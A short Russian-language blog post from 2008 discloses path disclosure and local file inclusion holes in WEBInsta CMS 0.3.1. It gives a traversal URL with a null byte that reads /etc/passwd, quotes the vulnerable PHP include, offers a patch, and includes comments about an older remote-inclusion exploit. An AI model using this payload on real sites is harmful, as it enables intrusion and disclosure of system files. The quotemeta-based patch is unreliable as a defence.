WEBInsta CMS 0.3.1 - раскрытие путей, локальный инклуд
Дата: 23.08.2008, Категория: Взлома и защита
Более ранние/поздние версии не смотрел.
Раскрытие путей:
http://host/admin/modules/about.php
http://host/modules/counter/module.def.php
http://host/modules/usersonline/module.def.php
Локальный инклуд:
http://host/admin/modules/about.php?name=../../../../../../../../../etc/passwd%00
$name=$_GET['name'];
include("../../modules/$name/module.info.php");
А я думал, что такого уже нигде не встретишь...
Защититься можно так:
| <?php // закрываем доступ для обычного посетителя if(!isset($_SESSION["login"])) { header("Location: ../admin.php"); return; } // проверяем $_GET['name'] на вшивость $name = quotemeta($_GET['name']); if(file_exists("../../modules/$name/module.info.php")) { include("../../modules/$name/module.info.php"); } else { die(); } ?> |
Raz0r 23.08.2008
в этой версии двига есть еще удаленный инклуд и обнаружен он был в 2006 году! =)
http://www.milw0rm.com/exploits/2175
c0nst 23.08.2008
O_O ого, не думал что я такой археолог...
p.s. чего тебя в асе не видно?
|
О блоге
RSS-лента Друзья и партнеры
Счетчики |
